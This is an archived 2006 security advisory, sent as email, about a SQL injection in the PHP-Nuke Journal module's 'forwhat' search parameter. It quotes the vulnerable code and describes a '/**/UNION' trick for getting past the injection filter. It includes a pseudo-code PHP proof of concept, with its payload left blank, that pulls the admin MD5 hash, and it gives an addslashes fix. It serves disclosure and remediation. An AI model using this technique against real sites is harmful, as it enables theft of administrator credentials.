nst-29.txt

2006-10-31T00:00:00
ID PACKETSTORM:51534
Type packetstorm
Reporter Paisterist
Modified 2006-10-31T00:00:00

Description

                                        
                                            `------=_Part_94883_6292592.1162313436170  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
/*  
--------------------------------------------------------  
[N]eo [S]ecurity [T]eam [NST] - Advisory 29 - 2006-10-31  
--------------------------------------------------------  
Program: PHP-Nuke  
Homepage: http://www.php.net  
Vulnerable Versions: PHP-Nuke <= 7.9  
Risk: Medium  
Impact: Medium Risk  
  
-==PHP-Nuke <= 7.9 Journal module (search.php) "forwhat" SQL Injection  
vulnerability==-  
---------------------------------------------------------  
  
- Description  
---------------------------------------------------------  
PHP-Nuke is a news automated system specially designed to be used in  
Intranets and Internet. The Administrator has total control of his web site,  
registered users, and he will have in the hand a powerful assembly of tools  
to maintain an active and 100% interactive web site using databases.  
  
- Tested  
---------------------------------------------------------  
localhost & many sites  
  
- Vulnerability Description  
---------------------------------------------------------  
  
In /modules/Journal/search.php the "forwhat" variable is not sanitized  
correctly. Here is the vulnerable code:  
  
==[ /modules/Journal/search.php 125-136 ]==========================  
[...]  
if ($bywhat == 'aid'):  
if ($exact == '1') {  
$sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
".$user_prefix."_users u WHERE u.username=j.aid and j.aid='$forwhat' order  
by j.jid DESC";  
} else {  
$sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
".$user_prefix."_users u WHERE u.username=j.aid and j.aid like '%$forwhat%'  
order by j.jid DESC";  
} elseif ($bywhat == 'title'):  
$sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
".$user_prefix."_users u WHERE u.username=j.aid and j.title like  
'%$forwhat%' order by j.jid DESC";  
elseif ($bywhat == 'bodytext'):  
$sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
".$user_prefix."_users u WHERE u.username=j.aid and j.bodytext LIKE  
'%$forwhat%' order by j.jid DESC";  
elseif ($bywhat == 'comment'):  
$sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
".$user_prefix."_users u, ".$user_prefix."_journal_comments c WHERE  
u.username=j.aid and c.rid=j.jid and c.comment LIKE '%$forwhat%' order by  
j.jid DESC";  
endif;  
[...]  
==[ end /modules/Journal/search.php ]==============================  
  
magic_quotes_gpc php directive must be turned Off so the simple quotes (')  
are not filtered. Also we have to know the prefix  
used for the database tables ("nuke_" by default).  
  
In this way, bypassing the SQL Injection Protection, like using someone like  
'/**/UNION ' and not ' UNION ' in our sql injections, we can get the admin  
md5 hash without any problems.  
  
==Pseudo-Code Proof of Concept exploit==  
<?  
/*  
  
Neo Security Team - Pseudo-Code Proof of Concept Exploit  
http://www.neosecurityteam.net  
Paisterist  
  
*/  
set_time_limit(0);  
$host="localhost";  
$path="/phpnuke/";  
$port="80";  
$fp = fsockopen($host, $port, $errno, $errstr, 30);  
$data=""; /* Here the variables, like "bywhat" and "forwhat", with the SQL  
Injection */  
  
if ($fp) {  
/* we put the POST request on $p variable, sending the data saved on  
$data. */  
  
fwrite($fp, $p);  
  
while (!feof($fp)) {  
$content .= fread($fp, 4096);  
}  
  
preg_match("/([a-z0-9]{32})/", $content, $matches);  
  
if ($matches[0])  
print "<b>Hash: </b>".$matches[0];  
}  
?>  
==Pseudo-Code Proof of Concept exploit==  
  
Whit this PoC code i get the md5 hash of the first admin (God) of the  
nuke_authors table.  
  
- How to fix it? More information?  
--------------------------------------------------------  
  
You can found a patch on http://www.neosecurityteam.net/foro/  
  
Also, you can modify the line 61 of /modules/Journal/search.php, adding  
slashes before the simple quotes with the addslashes() function:  
  
==[ /modules/Search/index.php 59-62 ]==========================  
[...]  
else :  
$forwhat = filter($forwhat, "nohtml");  
$forwhat = addslashes(filter($forwhat, "nohtml"));  
endif;  
[...]  
==[ end /modules/Search/index.php ]==============================  
  
That's a momentary solution to the problem. I recommend to download the  
PHP-Nuke 8.0 version in the next days... it is not  
free at the moment.  
  
- References  
--------------------------------------------------------  
http://www.neosecurityteam.net/index.php?action=advisories&id=29  
  
- Credits  
--------------------------------------------------------  
Search module SQL Injection discovered by Paisterist -> paisterist[dot]nst  
[at] gmail[dot]com  
  
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/  
  
  
- Greets  
--------------------------------------------------------  
HaCkZaTaN  
K4P0  
Daemon21  
Link  
0m3gA_x  
LINUX  
nitrous  
m0rpheus  
nikyt0x  
KingMetal  
Knightmare  
  
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!  
  
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@  
'@@@@@''@@'@@@''''''''@@''@@@''@@  
'@@'@@@@@@''@@@@@@ @@@'''''@@@  
'@@'''@@@@'''''''''@@@''''@@@  
@@@@''''@@'@@@@@@@@@@''''@@@@@  
  
/* EOF */  
  
--   
Paisterist  
  
Neo Security Team http://neosecurityteam.net  
  
------=_Part_94883_6292592.1162313436170  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
<br clear="all">/*<br>--------------------------------------------------------<br>[N]eo [S]ecurity [T]eam [NST] - Advisory 29 - 2006-10-31<br>--------------------------------------------------------<br>Program: PHP-Nuke<br>  
Homepage: <a href="http://www.php.net">http://www.php.net</a><br>Vulnerable Versions: PHP-Nuke <= 7.9<br>Risk: Medium<br>Impact: Medium Risk<br><br>-==PHP-Nuke <= 7.9 Journal module (search.php) "forwhat" SQL Injection vulnerability==-  
<br>---------------------------------------------------------<br><br>- Description<br>---------------------------------------------------------<br>PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.  
<br><br>- Tested<br>---------------------------------------------------------<br>localhost & many sites<br><br>- Vulnerability Description<br>---------------------------------------------------------<br><br>In /modules/Journal/search.php the "forwhat" variable is not sanitized correctly. Here is the vulnerable code:  
<br><br>==[ /modules/Journal/search.php 125-136 ]==========================<br>[...]<br>if ($bywhat == 'aid'):<br>    if ($exact == '1') {<br>            $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status  
, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and j.aid='$forwhat' order by j.jid DESC";<br>        } else {            <br>  
            $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and   
j.aid like '%$forwhat%' order by j.jid DESC";<br>        } elseif ($bywhat == 'title'):<br>        $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE   
u.username=j.aid and j.title like '%$forwhat%' order by j.jid DESC";<br>        elseif ($bywhat == 'bodytext'):<br>        $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id  
, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and j.bodytext LIKE '%$forwhat%' order by j.jid DESC";<br>        elseif ($bywhat == 'comment'):<br>        $sql = "SELECT   
j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u, ".$user_prefix."_journal_comments c WHERE u.username=j.aid  
and c.rid=j.jid and c.comment LIKE '%$forwhat%' order by j.jid DESC";<br>        endif;<br>[...]<br>==[ end /modules/Journal/search.php ]==============================<br><br>magic_quotes_gpc php directive must be turned Off so the simple quotes (') are not filtered. Also we have to know the prefix  
<br> used for the database tables ("nuke_" by default).<br><br>In this way, bypassing the SQL Injection Protection, like using someone like '/**/UNION ' and not ' UNION ' in our sql injections, we can get the admin md5 hash without any problems.  
<br><br>==Pseudo-Code Proof of Concept exploit==<br><?<br>/*<br><br>Neo Security Team - Pseudo-Code Proof of Concept Exploit<br><a href="http://www.neosecurityteam.net">http://www.neosecurityteam.net</a><br>Paisterist<br>  
<br>*/<br>set_time_limit(0);<br>$host="localhost";<br>$path="/phpnuke/";<br>$port="80";<br>$fp = fsockopen($host, $port, $errno, $errstr, 30);<br>$data=""; /* Here the variables, like "bywhat" and "forwhat", with the SQL Injection */   
<br><br>if ($fp) {<br>    /* we put the POST request on $p variable, sending the data saved on $data. */<br><br>    fwrite($fp, $p);<br><br>    while (!feof($fp)) {<br>        $content .= fread($fp, 4096);<br>    }<br><br>  
    preg_match("/([a-z0-9]{32})/", $content, $matches);<br><br>    if ($matches[0])<br>    print "<b>Hash: </b>".$matches[0];<br>}<br>?><br>==Pseudo-Code Proof of Concept exploit==<br><br>  
Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table.<br><br>- How to fix it? More information?<br>--------------------------------------------------------<br><br>You can found a patch on   
<a href="http://www.neosecurityteam.net/foro/">http://www.neosecurityteam.net/foro/</a><br><br>Also, you can modify the line 61 of /modules/Journal/search.php, adding slashes before the simple quotes with the addslashes() function:  
<br><br>==[ /modules/Search/index.php 59-62 ]==========================<br>[...]<br>else :<br>    $forwhat = filter($forwhat, "nohtml");<br>    $forwhat = addslashes(filter($forwhat, "nohtml"));<br>    endif;  
<br>[...]<br>==[ end /modules/Search/index.php ]==============================<br><br>That's a momentary solution to the problem. I recommend to download the PHP-Nuke 8.0 version in the next days... it is not <br>free at the moment.  
<br><br>- References<br>--------------------------------------------------------<br><a href="http://www.neosecurityteam.net/index.php?action=advisories&id=29">http://www.neosecurityteam.net/index.php?action=advisories&id=29  
</a><br><br>- Credits<br>--------------------------------------------------------<br>Search module SQL Injection discovered by Paisterist -> paisterist[dot]nst [at] gmail[dot]com<br><br>[N]eo [S]ecurity [T]eam [NST] -   
<a href="http://www.neosecurityteam.net/">http://www.neosecurityteam.net/</a><br><br><br>- Greets<br>--------------------------------------------------------<br>HaCkZaTaN<br>K4P0<br>Daemon21<br>Link<br>0m3gA_x<br>LINUX<br>  
nitrous<br>m0rpheus<br>nikyt0x<br>KingMetal<br>Knightmare<br><br>Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!<br><br>@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@<br>'@@@@@''@@'@@@''''''''@@''@@@''@@<br>'@@'@@@@@@''@@@@@@ @@@'''''@@@  
<br>'@@'''@@@@'''''''''@@@''''@@@<br>@@@@''''@@'@@@@@@@@@@''''@@@@@<br><br>/* EOF */<br><br>-- <br>Paisterist<br><br>Neo Security Team <a href="http://neosecurityteam.net">http://neosecurityteam.net</a>  
  
------=_Part_94883_6292592.1162313436170--  
`